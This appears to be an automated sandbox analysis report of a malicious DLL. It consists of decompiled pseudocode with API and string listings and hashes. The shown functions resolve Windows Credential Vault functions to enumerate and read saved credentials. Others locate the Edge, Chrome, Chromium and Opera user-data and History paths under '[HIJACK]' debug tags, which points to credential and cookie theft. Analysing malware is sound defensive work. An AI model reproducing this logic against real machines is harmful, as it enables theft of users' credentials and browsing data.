                                                  					 *(_t43 + 0x3f0) =  *(_t43 - 0x10) >> 0x00000008 ^  *(0x104060e0 + ( *(_t43 - 0x10) & 0x000000ff) * 4);
                                                  					 *(_t43 + 0x3f4) =  *(_t43 - 0xc) >> 0x00000008 ^  *(0x104060e0 + ( *(_t43 - 0xc) & 0x000000ff) * 4);
                                                  					_t84 = _t84 - 1;
                                                  					_t98 = _t84;
                                                  					 *(_t43 + 0x3f8) =  *(_t43 - 8) >> 0x00000008 ^  *(0x104060e0 + ( *(_t43 - 8) & 0x000000ff) * 4);
                                                  				} while (_t84 != 0);
                                                  				 *0x104060c8 = 0x100418d0;
                                                  				 *0x104080e0 = 0x100418d0;
                                                  				 *0x104060c4 = 0x10041980;
                                                  				_t45 = E10041810(0x10041980, _t98);
                                                  				if(_t45 == 0) {
                                                  					 *0x104080e0 = 0x10041980;
                                                  				}
                                                  				return _t45;
                                                  			}

                                                  0x10040780
                                                  0x10040782
                                                  0x10040808
                                                  0x1004080f
                                                  0x10040812
                                                  0x1004081e
                                                  0x10040823
                                                  0x10040830
                                                  0x10040830
                                                  0x10040845
                                                  0x10040848
                                                  0x10040863
                                                  0x1004087e
                                                  0x10040899
                                                  0x10040899
                                                  0x1004089c
                                                  0x1004089c
                                                  0x100408ae
                                                  0x100408b3
                                                  0x100408b8
                                                  0x100408be
                                                  0x100408c5
                                                  0x100408c7
                                                  0x100408c7
                                                  0x100408ce

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dfe65363f9349887f810c415ac2fe774161be5ce2c0a43524af5390adaf27aaf
                                                  • Instruction ID: 353d1ebc3ce3fcbee98acb398c1f881b97e90d4684741fc405acce2987836237
                                                  • Opcode Fuzzy Hash: dfe65363f9349887f810c415ac2fe774161be5ce2c0a43524af5390adaf27aaf
                                                  • Instruction Fuzzy Hash: E1315037AA09264BD70CCB28DDB3BBD2290E748245F59517DE94BDB3D1DE6CD810C648
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E1014AD70() {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  
                                                  				_v8 = 0;
                                                  				if((E10015630() & 0x000000ff) != 0) {
                                                  					 *0x10404ec0 = LoadLibraryA("vaultcli.dll");
                                                  					if( *0x10404ec0 != 0) {
                                                  						 *0x104027e0 = GetProcAddress( *0x10404ec0, "VaultEnumerateItems");
                                                  						 *0x104027dc = GetProcAddress( *0x10404ec0, "VaultEnumerateVaults");
                                                  						 *0x104027e4 = GetProcAddress( *0x10404ec0, "VaultFree");
                                                  						 *0x104027d4 = GetProcAddress( *0x10404ec0, "VaultGetItem");
                                                  						 *0x104027e8 = GetProcAddress( *0x10404ec0, "VaultGetItem");
                                                  						 *0x104026cc = GetProcAddress( *0x10404ec0, "VaultOpenVault");
                                                  						 *0x104027d8 = GetProcAddress( *0x10404ec0, "VaultCloseVault");
                                                  						if( *0x104027dc == 0 ||  *0x104027e4 == 0 ||  *0x104027d4 == 0 ||  *0x104027e8 == 0 ||  *0x104026cc == 0 ||  *0x104027d8 == 0 ||  *0x104027e0 == 0) {
                                                  							_v12 = 0;
                                                  						} else {
                                                  							_v12 = 1;
                                                  						}
                                                  						_v8 = _v12;
                                                  					}
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  0x1014ad76
                                                  0x1014ad87
                                                  0x1014ad98
                                                  0x1014ada4
                                                  0x1014adbc
                                                  0x1014add3
                                                  0x1014ade9
                                                  0x1014ae00
                                                  0x1014ae17
                                                  0x1014ae2d
                                                  0x1014ae44
                                                  0x1014ae50
                                                  0x1014ae91
                                                  0x1014ae88
                                                  0x1014ae88
                                                  0x1014ae88
                                                  0x1014ae9b
                                                  0x1014ae9b
                                                  0x1014ada4
                                                  0x1014aea4

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 1014AD92
                                                  • GetProcAddress.KERNEL32(?,VaultEnumerateItems), ref: 1014ADB6
                                                  • GetProcAddress.KERNEL32(?,VaultEnumerateVaults), ref: 1014ADCD
                                                  • GetProcAddress.KERNEL32(?,VaultFree), ref: 1014ADE3
                                                  • GetProcAddress.KERNEL32(?,VaultGetItem), ref: 1014ADFA
                                                  • GetProcAddress.KERNEL32(?,VaultGetItem), ref: 1014AE11
                                                  • GetProcAddress.KERNEL32(?,VaultOpenVault), ref: 1014AE27
                                                  • GetProcAddress.KERNEL32(?,VaultCloseVault), ref: 1014AE3E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: VaultCloseVault$VaultEnumerateItems$VaultEnumerateVaults$VaultFree$VaultGetItem$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                  • API String ID: 2238633743-199985861
                                                  • Opcode ID: 04c8f7b1f920361f73c8600285ca18369f527aa4b87e92dd90dbb53c946938b0
                                                  • Instruction ID: 37a01f38fbc4ed67a538195389684c368b73a59073f24cea7f16aa85d4c85e37
                                                  • Opcode Fuzzy Hash: 04c8f7b1f920361f73c8600285ca18369f527aa4b87e92dd90dbb53c946938b0
                                                  • Instruction Fuzzy Hash: BA31F8B9911220DBD741DFA0CFC87E977B5F748302F64022AE805A72B8D77AD881CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E1014B760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                  				char _v8;
                                                  				intOrPtr _v16;
                                                  				char _v279;
                                                  				char _v280;
                                                  				char _v308;
                                                  				char _v336;
                                                  				char _v340;
                                                  				char _v356;
                                                  				char _v360;
                                                  				intOrPtr _v364;
                                                  				int _t46;
                                                  				void* _t53;
                                                  				void* _t55;
                                                  				intOrPtr _t94;
                                                  				void* _t97;
                                                  				void* _t98;
                                                  
                                                  				_t93 = __esi;
                                                  				_t92 = __edi;
                                                  				_t68 = __ebx;
                                                  				 *[fs:0x0] = _t94;
                                                  				_v340 = 0;
                                                  				E10019800( &_v336);
                                                  				_v8 = 0;
                                                  				_v280 = 0;
                                                  				E10025A10(__edi,  &_v279, 0, 0x103);
                                                  				__imp__SHGetSpecialFolderPathA(0,  &_v280, 0x1c, 0,  *[fs:0x0], 0x1016c0cf, 0xffffffff);
                                                  				E10025E1D( &_v280,  &_v280, 0x104, "\\Microsoft\\Edge\\User Data");
                                                  				_t97 = _t94 - 0x15c + 0x18;
                                                  				_t46 = PathFileExistsA( &_v280);
                                                  				_t100 = _t46;
                                                  				if(_t46 != 0) {
                                                  					E10014BD0( &_v356, _t100);
                                                  					_v8 = 1;
                                                  					E10147900(__ebx, _t92, __esi,  &_v280,  &_v356, "History");
                                                  					_t98 = _t97 + 0xc;
                                                  					if(E10014180( &_v356) > 0) {
                                                  						_v360 = 0;
                                                  						while(1) {
                                                  							_t53 = E10014180( &_v356);
                                                  							_t102 = _v360 - _t53;
                                                  							if(_v360 >= _t53) {
                                                  								break;
                                                  							}
                                                  							_t55 = E100022D0(E100141C0( &_v356, _t102, _v360), "System Profile");
                                                  							_t98 = _t98 + 8;
                                                  							if(_t55 == 0) {
                                                  								E100023C0( &_v308, 0x101ce0f6);
                                                  								E10002400(_t68,  &_v308, _t92, _t93, __eflags, "MSEDGE");
                                                  								E100023C0( &_v336, 0x101ce0f7);
                                                  								E10002400(_t68,  &_v336, _t92, _t93, __eflags, E100141C0( &_v356, __eflags, _v360));
                                                  								E10014C00(_a4, _v360, __eflags,  &_v336);
                                                  								_push(E100141C0( &_v356, __eflags, _v360));
                                                  								_push(0x1d4);
                                                  								_push("MsEdgeUserPath_20200617");
                                                  								E10145200(_t92, "[HIJACK][%s][%s][%d]: strChromeUserPath = %s\n", PathFindFileNameA(".\\task_cookie\\default_browser.cpp"));
                                                  								_t98 = _t98 + 0x14;
                                                  							}
                                                  							_v360 = _v360 + 1;
                                                  						}
                                                  						_v340 = 1;
                                                  					}
                                                  					_v8 = 0;
                                                  					E100014A0( &_v356);
                                                  				}
                                                  				_v364 = _v340;
                                                  				_v8 = 0xffffffff;
                                                  				E10014BB0( &_v336);
                                                  				 *[fs:0x0] = _v16;
                                                  				return _v364;
                                                  			}

                                                  APIs
                                                  • _memset.LIBCMT ref: 1014B7AF
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001C,00000000), ref: 1014B7C4
                                                  • _strcat_s.LIBCMT ref: 1014B7DB
                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1014B7EA
                                                    • Part of subcall function 10147900: PathFileExistsA.SHLWAPI(?), ref: 1014790D
                                                  • PathFindFileNameA.SHLWAPI(.\task_cookie\default_browser.cpp,MsEdgeUserPath_20200617,000001D4,00000000,00000000,?,00000000,00000000,101CE0F7,MSEDGE,101CE0F6,?,System Profile), ref: 1014B90C
                                                  Strings
                                                  Memory Dump Source
• Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
• Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
• Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$File$Exists$FindFolderNameSpecial_memset_strcat_s
                                                  • String ID: .\task_cookie\default_browser.cpp$History$MSEDGE$MsEdgeUserPath_20200617$System Profile$[HIJACK][%s][%s][%d]: strChromeUserPath = %s$\Microsoft\Edge\User Data
                                                  • API String ID: 2377150101-2008089585
                                                  • Opcode ID: f716c15180a23ca9f3378336792c2039d138575f56e5ef3248a6f4efe9ee1632
                                                  • Instruction ID: 39c4aab5d6bfb16195acb7206771083e9d7335fade4270aad328213cfeb06f3a
                                                  • Opcode Fuzzy Hash: f716c15180a23ca9f3378336792c2039d138575f56e5ef3248a6f4efe9ee1632
                                                  • Instruction Fuzzy Hash: D0416CB5800218ABDB24DB50DD92BDEB778FB15704F1001D8F509A62A1EB756FC4CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E1000EDB0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				char _v8;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				char _v64;
                                                  				char _v92;
                                                  				intOrPtr _v96;
                                                  				intOrPtr* _t100;
                                                  				intOrPtr* _t101;
                                                  				char* _t104;
                                                  				intOrPtr* _t111;
                                                  				intOrPtr* _t115;
                                                  				char* _t120;
                                                  				intOrPtr* _t123;
                                                  				intOrPtr* _t132;
                                                  				intOrPtr* _t135;
                                                  				intOrPtr* _t147;
                                                  				char* _t154;
                                                  				intOrPtr* _t157;
                                                  				intOrPtr* _t166;
                                                  				intOrPtr* _t169;
                                                  				intOrPtr* _t182;
                                                  				intOrPtr* _t185;
                                                  				intOrPtr* _t186;
                                                  				intOrPtr _t288;
                                                  				void* _t289;
                                                  				void* _t291;
                                                  				void* _t296;
                                                  				void* _t300;
                                                  				void* _t302;
                                                  				void* _t319;
                                                  				void* _t321;
                                                  
                                                  				_push(0xffffffff);
                                                  				_push(0x10170d38);
                                                  				_push( *[fs:0x0]);
                                                  				 *[fs:0x0] = _t288;
                                                  				_t289 = _t288 - 0x50;
                                                  				_v96 = __ecx;
                                                  				if(E1000F990(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
                                                  					E10001320( &_v92, "map/set<T> too long");
                                                  					_v8 = 0;
                                                  					E100011E0( &_v64,  &_v92);
                                                  					E10028911( &_v64, 0x1027f2d8);
                                                  					_v8 = 0xffffffff;
                                                  					E10001360( &_v92);
                                                  				}
                                                  				_v20 = E1000FC50(_v96,  *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0);
                                                  				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
                                                  				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
                                                  					__eflags = _a8 & 0x000000ff;
                                                  					if((_a8 & 0x000000ff) == 0) {
                                                  						_t100 = E1000E900(_a12);
                                                  						_t289 = _t289 + 4;
                                                  						 *_t100 = _v20;
                                                  						_t101 = E1000F480(_v96);
                                                  						__eflags = _a12 -  *_t101;
                                                  						if(_a12 ==  *_t101) {
                                                  							 *((intOrPtr*)(E1000F480(_v96))) = _v20;
                                                  						}
                                                  					} else {
                                                  						_t185 = E1000E8E0(_a12);
                                                  						_t289 = _t289 + 4;
                                                  						 *_t185 = _v20;
                                                  						_t186 = E1000F2B0(_v96);
                                                  						__eflags = _a12 -  *_t186;
                                                  						if(_a12 ==  *_t186) {
                                                  							 *((intOrPtr*)(E1000F2B0(_v96))) = _v20;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					 *((intOrPtr*)(E1000F4A0(_v96))) = _v20;
                                                  					 *((intOrPtr*)(E1000F2B0(_v96))) = _v20;
                                                  					 *((intOrPtr*)(E1000F480(_v96))) = _v20;
                                                  				}
                                                  				_v24 = _v20;
                                                  				while(1) {
                                                  					_t104 = E1000E8A0( *((intOrPtr*)(E1000E8F0(_v24))));
                                                  					_t291 = _t289 + 8;
                                                  					if( *_t104 != 0) {
                                                  						break;
                                                  					}
                                                  					_t111 = E1000E8F0(_v24);
                                                  					_t115 = E1000E8E0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24)))))));
                                                  					_t296 = _t291 + 0x10;
                                                  					if( *_t111 !=  *_t115) {
                                                  						_a12 =  *((intOrPtr*)(E1000E8E0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24)))))))));
                                                  						_t120 = E1000E8A0(_a12);
                                                  						_t300 = _t296 + 0x10;
                                                  						__eflags =  *_t120;
                                                  						if( *_t120 != 0) {
                                                  							_t123 = E1000E8E0( *((intOrPtr*)(E1000E8F0(_v24))));
                                                  							_t302 = _t300 + 8;
                                                  							__eflags = _v24 -  *_t123;
                                                  							if(_v24 ==  *_t123) {
                                                  								_t135 = E1000E8F0(_v24);
                                                  								_t302 = _t302 + 4;
                                                  								_v24 =  *_t135;
                                                  								E1000F4C0(_v96, __eflags, _v24);
                                                  							}
                                                  							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0(_v24)))))) = 1;
                                                  							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))))))))) = 0;
                                                  							_t132 = E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))));
                                                  							_t289 = _t302 + 0x1c;
                                                  							E1000F2D0(_v96, __eflags,  *_t132);
                                                  						} else {
                                                  							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0(_v24)))))) = 1;
                                                  							 *((char*)(E1000E8A0(_a12))) = 1;
                                                  							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))))))))) = 0;
                                                  							_t147 = E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))));
                                                  							_t289 = _t300 + 0x20;
                                                  							_v24 =  *_t147;
                                                  						}
                                                  					} else {
                                                  						_a12 =  *((intOrPtr*)(E1000E900( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24)))))))));
                                                  						_t154 = E1000E8A0(_a12);
                                                  						_t319 = _t296 + 0x10;
                                                  						if( *_t154 != 0) {
                                                  							_t157 = E1000E900( *((intOrPtr*)(E1000E8F0(_v24))));
                                                  							_t321 = _t319 + 8;
                                                  							__eflags = _v24 -  *_t157;
                                                  							if(_v24 ==  *_t157) {
                                                  								_t169 = E1000E8F0(_v24);
                                                  								_t321 = _t321 + 4;
                                                  								_v24 =  *_t169;
                                                  								E1000F2D0(_v96, __eflags, _v24);
                                                  							}
                                                  							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0(_v24)))))) = 1;
                                                  							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))))))))) = 0;
                                                  							_t166 = E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))));
                                                  							_t289 = _t321 + 0x1c;
                                                  							E1000F4C0(_v96, __eflags,  *_t166);
                                                  						} else {
                                                  							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0(_v24)))))) = 1;
                                                  							 *((char*)(E1000E8A0(_a12))) = 1;
                                                  							 *((char*)(E1000E8A0( *((intOrPtr*)(E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))))))))) = 0;
                                                  							_t182 = E1000E8F0( *((intOrPtr*)(E1000E8F0(_v24))));
                                                  							_t289 = _t319 + 0x20;
                                                  							_v24 =  *_t182;
                                                  						}
                                                  					}
                                                  				}
                                                  				 *((char*)(E1000E8A0( *((intOrPtr*)(E1000F4A0(_v96)))))) = 1;
                                                  				E1000F730(_a4, _v20, _v96);
                                                  				 *[fs:0x0] = _v16;
                                                  				return _a4;
                                                  			}

                                                  APIs
                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 1000EDFD
                                                    • Part of subcall function 10028911: RaiseException.KERNEL32(?,?,100235F7,10001F33,?,?,?,?,100235F7,10001F33,1027F310,10401814), ref: 10028951
                                                  • HandleT.LIBCPMTD ref: 1000EE5F
                                                  • HandleT.LIBCPMTD ref: 1000EE6C
                                                  • HandleT.LIBCPMTD ref: 1000EE79
                                                  • HandleT.LIBCPMTD ref: 1000EEA1
                                                  • HandleT.LIBCPMTD ref: 1000EEB0
                                                    • Part of subcall function 1000F4C0: HandleT.LIBCPMTD ref: 1000F554
                                                    • Part of subcall function 1000F4C0: HandleT.LIBCPMTD ref: 1000F563
                                                  • HandleT.LIBCPMTD ref: 1000EED0
                                                  • HandleT.LIBCPMTD ref: 1000EEDF
                                                  • HandleT.LIBCPMTD ref: 1000F1E2
                                                  Strings
                                                  Memory Dump Source
• Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
• Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
• Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
• Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$ExceptionRaisestd::bad_exception::bad_exception
                                                  • String ID: map/set<T> too long
                                                  • API String ID: 1242349364-1285458680
                                                  • Opcode ID: 8e9449f9306d3ccc2e28a1c575853ad9062aa127365a92dfcd5266d0cd5e78e7
                                                  • Instruction ID: 1971496d0e2c208c9c2e3d5f72156d91c7a27aaab9821f0581c1d7942997eee7
                                                  • Opcode Fuzzy Hash: 8e9449f9306d3ccc2e28a1c575853ad9062aa127365a92dfcd5266d0cd5e78e7
                                                  • Instruction Fuzzy Hash: F9E11EF9D002859FEB04DBA4E88196F7375EF89344F148978E4096B35ADA35FD01CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E1014B970(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v8;
                                                  				intOrPtr _v16;
                                                  				char _v279;
                                                  				char _v280;
                                                  				char _v308;
                                                  				char _v336;
                                                  				char _v340;
                                                  				char _v356;
                                                  				char _v360;
                                                  				intOrPtr _v364;
                                                  				char* _v368;
                                                  				char* _v372;
                                                  				int _t54;
                                                  				void* _t62;
                                                  				void* _t64;
                                                  				void* _t76;
                                                  				void* _t103;
                                                  				intOrPtr _t104;
                                                  				void* _t106;
                                                  				void* _t107;
                                                  				void* _t108;
                                                  
                                                  				_t103 = __esi;
                                                  				_t102 = __edi;
                                                  				_t76 = __ebx;
                                                  				 *[fs:0x0] = _t104;
                                                  				_v340 = 0;
                                                  				E10019800( &_v336);
                                                  				_v8 = 0;
                                                  				_v280 = 0;
                                                  				E10025A10(__edi,  &_v279, 0, 0x103);
                                                  				_t106 = _t104 - 0x164 + 0xc;
                                                  				__imp__SHGetSpecialFolderPathA(0,  &_v280, 0x1c, 0,  *[fs:0x0], 0x1016c0ef, 0xffffffff);
                                                  				if(_a8 == 0) {
                                                  					_v368 = "\\Chromium\\User Data";
                                                  				} else {
                                                  					_v368 = "\\Google\\Chrome\\User Data";
                                                  				}
                                                  				E10025E1D(_v368,  &_v280, 0x104, _v368);
                                                  				_t107 = _t106 + 0xc;
                                                  				_t54 = PathFileExistsA( &_v280);
                                                  				_t111 = _t54;
                                                  				if(_t54 != 0) {
                                                  					E10014BD0( &_v356, _t111);
                                                  					_v8 = 1;
                                                  					E10147900(_t76, _t102, _t103,  &_v280,  &_v356, "History");
                                                  					_t108 = _t107 + 0xc;
                                                  					if(E10014180( &_v356) > 0) {
                                                  						_v360 = 0;
                                                  						while(1) {
                                                  							_t62 = E10014180( &_v356);
                                                  							_t113 = _v360 - _t62;
                                                  							if(_v360 >= _t62) {
                                                  								break;
                                                  							}
                                                  							_t64 = E100022D0(E100141C0( &_v356, _t113, _v360), "System Profile");
                                                  							_t108 = _t108 + 8;
                                                  							if(_t64 == 0) {
                                                  								E100023C0( &_v308, 0x101ce0ef);
                                                  								__eflags = _a8;
                                                  								if(__eflags == 0) {
                                                  									_v372 = "CHROMIUM";
                                                  								} else {
                                                  									_v372 = "CHROME";
                                                  								}
                                                  								E10002400(_t76,  &_v308, _t102, _t103, __eflags, _v372);
                                                  								E100023C0( &_v336, 0x101ce0f3);
                                                  								E10002400(_t76,  &_v336, _t102, _t103, __eflags, E100141C0( &_v356, __eflags, _v360));
                                                  								E10014C00(_a4,  &_v336, __eflags,  &_v336);
                                                  								_push(E100141C0( &_v356, __eflags, _v360));
                                                  								_push(0x1a6);
                                                  								_push("ChromeUserPath_20200617");
                                                  								E10145200(_t102, "[HIJACK][%s][%s][%d]: strChromeUserPath = %s\n", PathFindFileNameA(".\\task_cookie\\default_browser.cpp"));
                                                  								_t108 = _t108 + 0x14;
                                                  							}
                                                  							_v360 = _v360 + 1;
                                                  						}
                                                  						_v340 = 1;
                                                  					}
                                                  					_v8 = 0;
                                                  					E100014A0( &_v356);
                                                  				}
                                                  				_v364 = _v340;
                                                  				_v8 = 0xffffffff;
                                                  				E10014BB0( &_v336);
                                                  				 *[fs:0x0] = _v16;
                                                  				return _v364;
                                                  			}


                                                  APIs
                                                  • _memset.LIBCMT ref: 1014B9BF
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001C,00000000), ref: 1014B9D4
                                                  • _strcat_s.LIBCMT ref: 1014BA09
                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1014BA18
                                                  • PathFindFileNameA.SHLWAPI(.\task_cookie\default_browser.cpp,ChromeUserPath_20200617,000001A6,00000000,00000000,?,00000000,00000000,101CE0F3,1026E0A8,101CE0EF,?,System Profile), ref: 1014BB58
                                                  Strings
                                                  • [HIJACK][%s][%s][%d]: strChromeUserPath = %s, xrefs: 1014BB5F
                                                  • .\task_cookie\default_browser.cpp, xrefs: 1014BB53
                                                  • System Profile, xrefs: 1014BA95
                                                  • ChromeUserPath_20200617, xrefs: 1014BB4E
                                                  • History, xrefs: 1014BA35
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$File$ExistsFindFolderNameSpecial_memset_strcat_s
                                                  • String ID: .\task_cookie\default_browser.cpp$ChromeUserPath_20200617$History$System Profile$[HIJACK][%s][%s][%d]: strChromeUserPath = %s
                                                  • API String ID: 2302716160-4005611149
                                                  • Opcode ID: 8319eb24f1bbe4d255d370cde703c4438783b0fe77019c6cf10ab775486d92e6
                                                  • Instruction ID: 0b641ac6698a21ca8cbeabfd1c69a220e60e372652a98603b7695c2d1861ed61
                                                  • Opcode Fuzzy Hash: 8319eb24f1bbe4d255d370cde703c4438783b0fe77019c6cf10ab775486d92e6
                                                  • Instruction Fuzzy Hash: EE515DB5800218EBDB25DB50DD92BDAB774FB14700F5041D8E50AA72A1EB766FC4CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 55%
                                                  			E1014BD40(void* __edi, void* __eflags, intOrPtr _a4) {
                                                  				char _v267;
                                                  				char _v268;
                                                  				char _v272;
                                                  
                                                  				_t26 = __edi;
                                                  				_v272 = 0;
                                                  				_v268 = 0;
                                                  				E10025A10(__edi,  &_v267, 0, 0x103);
                                                  				__imp__SHGetSpecialFolderPathA(0,  &_v268, 0x1a, 0);
                                                  				E10025E1D( &_v268,  &_v268, 0x104, "\\Opera Software\\Opera Stable");
                                                  				if(PathFileExistsA( &_v268) != 0) {
                                                  					_push( &_v268);
                                                  					_push(0x12e);
                                                  					_push("OperaUserPath");
                                                  					E10145200(_t26, "[HIJACK][%s][%s][%d]: strOperaUserPath = %s\n", PathFindFileNameA(".\\task_cookie\\default_browser.cpp"));
                                                  					E100023C0(_a4,  &_v268);
                                                  					_v272 = 1;
                                                  				}
                                                  				return _v272;
                                                  			}

                                                  APIs
                                                  • _memset.LIBCMT ref: 1014BD68
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1014BD7D
                                                  • _strcat_s.LIBCMT ref: 1014BD94
                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1014BDA3
                                                  • PathFindFileNameA.SHLWAPI(.\task_cookie\default_browser.cpp,OperaUserPath,0000012E,00000000), ref: 1014BDC3
                                                    • Part of subcall function 10145200: _memset.LIBCMT ref: 1014522B
                                                    • Part of subcall function 10145200: OutputDebugStringA.KERNEL32(?,?,?,?,?,1014BB69,[HIJACK][%s][%s][%d]: strChromeUserPath = %s), ref: 10145263
                                                  Strings
                                                  • [HIJACK][%s][%s][%d]: strOperaUserPath = %s, xrefs: 1014BDCA
                                                  • .\task_cookie\default_browser.cpp, xrefs: 1014BDBE
                                                  • \Opera Software\Opera Stable, xrefs: 1014BD83
                                                  • OperaUserPath, xrefs: 1014BDB9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path$File_memset$DebugExistsFindFolderNameOutputSpecialString_strcat_s
